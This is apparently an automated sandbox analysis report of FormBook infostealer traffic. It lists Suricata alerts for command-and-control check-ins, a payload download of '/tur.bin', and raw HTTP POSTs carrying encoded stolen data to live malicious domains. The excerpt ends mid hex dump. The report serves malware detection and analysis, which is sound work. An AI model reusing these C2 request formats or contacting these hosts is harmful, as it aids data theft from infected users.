        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49796 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49759 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49759 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49757 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49755 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49755 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49808 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49761 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49766 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49746 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49778 -> 133.130.35.90:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49767 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49767 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49810 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49771 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49771 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49748 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49779 -> 133.130.35.90:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49779 -> 133.130.35.90:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49821 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 103.21.221.4:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49785 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49762 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49780 -> 137.175.33.56:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49822 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49812 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49795 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49773 -> 103.21.221.4:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49795 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49804 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49774 -> 103.21.221.4:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49736 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49782 -> 137.175.33.56:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49763 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49763 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49793 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49775 -> 103.21.221.4:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49775 -> 103.21.221.4:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49799 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49799 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49797 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49803 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49803 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49809 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49817 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49805 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49811 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49811 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49807 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49783 -> 137.175.33.56:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49807 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49783 -> 137.175.33.56:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49818 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49815 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49815 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49787 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49787 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49820 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49814 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49791 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49791 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49823 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49823 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49792 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49798 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49813 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49819 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49819 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49740 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49800 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49802 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49801 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49742 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49790 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49741 -> 84.32.84.32:80
        Performs DNS queries to domains with low reputation
        Source: DNS query: www.ngmr.xyz
        Source: Joe Sandbox ViewIP Address: 103.21.221.4 103.21.221.4
        Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
        Source: Joe Sandbox ViewASN Name: LINKNET-ID-APLinknetASNID LINKNET-ID-APLinknetASNID
        Source: Joe Sandbox ViewASN Name: PEGTECHINCUS PEGTECHINCUS
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49727 -> 185.86.211.136:80
        Source: global trafficHTTP traffic detected: GET /tur.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fredy.eeConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /tur.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fredy.eeCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /tcs6/?oz=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.invicta.worldConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /bqye/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.whats-in-the-box.orgOrigin: http://www.whats-in-the-box.orgReferer: http://www.whats-in-the-box.org/bqye/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4d 6c 47 52 73 57 6e 56 74 53 54 63 32 4f 6f 75 6a 4a 64 50 73 38 74 7a 34 4c 55 47 55 70 38 35 6f 49 55 7a 7a 4a 50 63 39 55 74 45 35 62 38 6c 50 75 44 38 6f 31 37 51 74 59 6c 45 2b 2b 57 6a 77 4b 50 52 69 55 66 45 71 75 6f 31 38 63 45 67 55 31 56 39 32 6b 58 78 75 31 47 54 4f 57 6c 39 32 4a 36 4c 31 50 57 54 4e 75 42 59 6e 37 43 46 2f 6d 4b 2b 65 37 4f 44 69 74 51 5a 52 79 72 55 62 75 70 41 54 43 76 51 55 56 58 78 4f 79 67 69 57 57 6f 61 54 68 34 4c 6c 77 53 6a 70 35 4f 5a 50 45 7a 46 4a 34 49 49 6d 72 68 70 77 4a 4f 66 48 59 50 30 63 77 3d 3d Data Ascii: oz=lpp2G9wZJQS0MlGRsWnVtSTc2OoujJdPs8tz4LUGUp85oIUzzJPc9UtE5b8lPuD8o17QtYlE++WjwKPRiUfEquo18cEgU1V92kXxu1GTOWl92J6L1PWTNuBYn7CF/mK+e7ODitQZRyrUbupATCvQUVXxOygiWWoaTh4LlwSjp5OZPEzFJ4IImrhpwJOfHYP0cw==
        Source: global trafficHTTP traffic detected: POST /bqye/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.whats-in-the-box.orgOrigin: http://www.whats-in-the-box.orgReferer: http://www.whats-in-the-box.org/bqye/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4e 47 65 52 70 31 66 56 72 79 54 66 7a 4f 6f 75 71 70 64 4c 73 38 68 7a 34 4b 52 44 55 37 49 35 6d 4e 6f 7a 79 49 50 63 78 30 74 45 33 37 38 67 4c 75 44 6e 6f 31 6d 76 74 59 4a 45 2b 2b 43 6a 77 4c 2f 52 6c 6c 66 44 72 2b 6f 72 30 38 45 69 62 56 56 39 32 6b 58 78 75 78 72 2b 4f 57 39 39 32 5a 6d 4c 31 75 57 55 54 2b 42 62 7a 72 43 46 75 32 4c 33 65 37 4f 6c 69 6f 49 2f 52 77 6a 55 62 73 78 41 53 54 76 54 42 6c 58 33 4b 79 67 31 5a 58 31 55 66 46 4e 36 6c 44 76 77 6a 4d 32 74 44 79 69 66 55 4b 38 73 6c 34 39 62 30 35 33 33 46 61 4f 76 42 2b 4c 69 62 47 41 62 30 52 52 4d 32 65 51 58 55 67 4e 6b 4d 76 34 3d Data Ascii: oz=lpp2G9wZJQS0NGeRp1fVryTfzOouqpdLs8hz4KRDU7I5mNozyIPcx0tE378gLuDno1mvtYJE++CjwL/RllfDr+or08EibVV92kXxuxr+OW992ZmL1uWUT+BbzrCFu2L3e7OlioI/RwjUbsxASTvTBlX3Kyg1ZX1UfFN6lDvwjM2tDyifUK8sl49b0533FaOvB+LibGAb0RRM2eQXUgNkMv4=
        Source: global trafficHTTP traffic detected: POST /bqye/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.whats-in-the-box.orgOrigin: http://www.whats-in-the-box.orgReferer: http://www.whats-in-the-box.org/bqye/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4e 47 65 52 70 31 66 56 72 79 54 66 7a 4f 6f 75 71 70 64 4c 73 38 68 7a 34 4b 52 44 55 37 77 35 6d 2f 77 7a 30 72 58 63 77 30 74 45 2f 62 38 68 4c 75 44 6d 6f 31 2f 6d 74 59 55 7a 2b 38 36 6a 78 6f 6e 52 6b 52 7a 44 6c 2b 6f 72 32 38 45 6e 55 31 55 35 32 6b 48 39 75 31 4c 2b 4f 57 39 39 32 59 57 4c 69 76 57 55 52 2b 42 59 6e 37 43 42 2f 6d 4c 66 65 2f 62 51 69 6f 38 4a 45 51 44 55 61 4d 68 41 65 42 33 54 64 31 58 31 48 53 68 77 5a 58 35 66 66 45 6b 4c 6c 43 61 74 6a 4c 71 74 41 48 44 2f 4d 70 63 57 7a 36 46 46 78 4d 66 34 4f 73 4b 66 42 75 72 63 62 58 59 6f 34 68 31 67 6f 4e 64 44 45 6c 42 54 50 6f 74 4e 6b 6f 75 4c 52 6a 4a 78 36 70 67 44 62 36 72 74 67 58 2f 2f 2f 34 6f 34 53 37 6a 30 62 31 75 78 4e 78 61 50 6d 6b 6e 58 77 73 39 4f 50 64 65 4a 50 62 51 30 67 45 41 63 74 39 77 74 70 6e 6f 42 73 6c 57 67 71 7a 79 49 70 45 55 36 51 34 69 4b 33 6f 6a 38 65 44 63 51 59 6c 56 32 62 38 37 46 67 63 57 77 6e 31 31 35 50 6c 4b 6e 58 71 74 63 6b 64 73 70 6b 67 57 61 59 74 70 4e 5a 78 47 72 49 74 75 56 57 54 39 55 30 6c 53 32 62 4a 44 43 79 78 6e 46 49 61 77 51 79 6d 6f 6b 77 4e 52 6a 5a 67 37 41 6f 48 5a 77 68 42 61 49 79 70 6a 4b 71 44 4a 4b 69 6f 6f 70 5a 66 4b 50 52 43 69 64 48 34 63 68 6a 57 6d 48 70 4e 6c 4f 33 56 41 76 64 42 4a 77 34 47 38 66 59 30 32 76 54 45 36 4c 49 6a 38 48 59 76 66 65 77 74 68 52 4f 55 33 4f 30 36 53 2f 70 79 6f 69 33 4c 43 37 56 57 33 69 73 74 4e 59 61 62 44 54 38 55 50 6b 78 73 41 67 4d 5a 53 59 37 77 79 35 36 4c 43 4e 73 44 42 52 58 41 45 2b 63 65 41 4a 38 7a 64 4c 43 44 7a 49 2b 48 38 58 4d 76 75 6b 43 68 72 6f 63 45 30 39 6f 4a 51 49 39 49 59 63 33 32 4c 58 62 32 45 43 2b 68 6d 30 49 34 70 31 72 45 51 31 65 73 59 62 5a 38 78 4f 61 76 57 2f 39 53 43 45 6f 57 7a 62 61 35 46 78 2b 30 6c 57 74 66 4f 51 41 65 58 54 54 44 39 39 6c 43 46 63 42 36 6a 6f 34 6f 5a 6c 67 72 55 71 52 2f 41 77 4e 7a 71 66 56 41 76 39 74 38 52 30 4b 69 48 62 50 56 54 42 4e 59 66 54 53 6f 63 42 50 Data Ascii: oz=lpp2G9wZJQS0NGeRp1fVryTfzOouqpdLs8hz4KRDU7w5m/wz0rXcw0tE/b8hLuDmo1/mtYUz+86jxonRkRzDl+or28EnU1U52kH9u1L+OW992YWLivWUR+BYn7CB/mLfe/bQio8JEQDUaMhAeB3Td1X1HShwZX5ffEkLlCatjLqtAHD/MpcWz6FFxMf4OsKfBurcbXYo4h1goNdDElBTPotNkouLRjJx6pgDb6rtgX///4o4S7j0b1uxNxaPmknXws9OPdeJPbQ0gEAct9wtpnoBslWgqzyIpEU6Q4iK3oj8eDcQYlV2b87FgcWwn115PlKnXqtckdspkgWaYtpNZxGrItuVWT9U0lS2bJDCyxnFIawQymokwN
        Source: global trafficHTTP traffic detected: GET /bqye/?UJ9=qN-llTKPHxntPrv0&oz=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.whats-in-the-box.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /was5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.linkwave.cloudOrigin: http://www.linkwave.cloudReferer: http://www.linkwave.cloud/was5/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 2f 2b 6b 48 41 43 61 36 58 44 48 61 6c 65 36 42 72 79 31 32 49 49 7a 76 78 62 54 6d 6b 6d 30 2b 49 54 30 42 30 67 6f 64 66 4e 72 4c 53 31 64 45 77 48 43 74 32 30 30 41 57 68 45 76 55 76 44 67 49 56 48 66 66 45 6b 7a 34 4a 64 73 30 34 39 7a 45 71 54 33 52 51 53 66 6d 78 2b 4f 49 55 6e 76 6a 6f 61 74 4d 52 62 38 62 41 33 6d 59 4f 6c 33 45 6b 51 6f 6e 45 51 67 63 37 52 32 46 78 2b 6f 38 43 53 68 43 6c 6b 56 63 2f 30 57 61 58 31 6b 6e 7a 73 30 39 63 55 6c 6a 72 6c 4e 78 39 58 52 2f 53 6f 62 56 45 38 6e 44 76 36 73 41 33 33 50 30 68 49 61 64 43 69 4e 57 53 42 79 71 38 52 43 55 67 3d 3d Data Ascii: oz=/+kHACa6XDHale6Bry12IIzvxbTmkm0+IT0B0godfNrLS1dEwHCt200AWhEvUvDgIVHffEkz4Jds049zEqT3RQSfmx+OIUnvjoatMRb8bA3mYOl3EkQonEQgc7R2Fx+o8CShClkVc/0WaX1knzs09cUljrlNx9XR/SobVE8nDv6sA33P0hIadCiNWSByq8RCUg==
        Source: global trafficHTTP traffic detected: POST /was5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.linkwave.cloudOrigin: http://www.linkwave.cloudReferer: http://www.linkwave.cloud/was5/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 2f 2b 6b 48 41 43 61 36 58 44 48 61 6b 2f 4b 42 6b 78 74 32 66 59 7a 77 6f 62 54 6d 75 47 30 69 49 54 34 42 30 68 63 33 66 2b 50 4c 53 58 46 45 78 43 32 74 78 30 30 41 5a 42 45 75 4c 2f 44 33 49 56 43 69 66 46 30 7a 34 4e 31 73 30 35 4e 7a 48 5a 72 30 51 41 53 42 71 52 2b 49 56 45 6e 76 6a 6f 61 74 4d 52 50 47 62 45 62 6d 59 39 74 33 45 47 30 6e 6b 45 51 76 66 37 52 32 53 68 2b 73 38 43 54 45 43 67 41 76 63 39 38 57 61 56 74 6b 6d 69 73 37 6f 4d 55 6a 38 37 6b 6c 34 4d 69 6f 31 52 63 79 61 30 4d 43 42 63 2b 72 42 68 6d 56 70 54 38 2b 65 52 2b 2f 53 69 34 61 6f 2b 51 5a 4a 67 2f 4f 33 39 6a 72 67 61 4f 42 36 75 48 50 56 44 2b 66 46 36 6b 3d Data Ascii: oz=/+kHACa6XDHak/KBkxt2fYzwobTmuG0iIT4B0hc3f+PLSXFExC2tx00AZBEuL/D3IVCifF0z4N1s05NzHZr0QASBqR+IVEnvjoatMRPGbEbmY9t3EG0nkEQvf7R2Sh+s8CTECgAvc98WaVtkmis7oMUj87kl4Mio1Rcya0MCBc+rBhmVpT8+eR+/Si4ao+QZJg/O39jrgaOB6uHPVD+fF6k=
        Source: global trafficHTTP traffic detected: POST /was5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.linkwave.cloudOrigin: http://www.linkwave.cloudReferer: http://www.linkwave.cloud/was5/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 2f 2b 6b 48 41 43 61 36 58 44 48 61 6b 2f 4b 42 6b 78 74 32 66 59 7a 77 6f 62 54 6d 75 47 30 69 49 54 34 42 30 68 63 33 66 2b 48 4c 53 45 4e 45 77 6c 61 74 77 30 30 41 51 68 45 56 4c 2f 44 32 49 52 75 75 66 46 34 4a 34 4c 78 73 6d 50 52 7a 50 4d 48 30 61 41 53 42 33 42 2b 4a 49 55 6e 66 6a 6f 4b 70 4d 52 66 47 62 45 62 6d 59 38 39 33 43 55 51 6e 69 45 51 67 63 37 52 71 46 78 2b 49 38 43 37 2b 43 68 42 59 64 4e 63 57 62 31 39 6b 6b 55 41 37 31 38 55 68 39 37 6b 39 34 4d 2b 4a 31 52 51 45 61 30 34 34 42 66 4f 72 41 41 50 36 37 58 6f 39 4c 42 71 39 59 7a 45 58 6b 38 5a 48 4a 44 7a 73 33 72 7a 64 68 66 47 4d 37 76 48 75 53 69 6e 55 53 2b 4d 51 73 67 65 77 4f 49 50 76 52 2f 51 45 58 54 2f 61 52 65 67 70 55 6c 42 33 52 59 66 6b 61 58 6b 6f 36 57 45 48 66 78 54 45 78 36 4f 2b 6d 71 44 6c 43 6e 34 53 52 66 57 6e 71 47 57 70 67 73 51 41 6e 56 35 65 55 33 6a 56 49 69 36 2b 77 43 55 4c 58 6e 37 59 44 51 41 59 36 2f 37 73 43 50 6b 78 35 7a 49 4a 56 50 67 62 43 38 64 67 62 47 4c 43 66 7a 6b 70 31 52 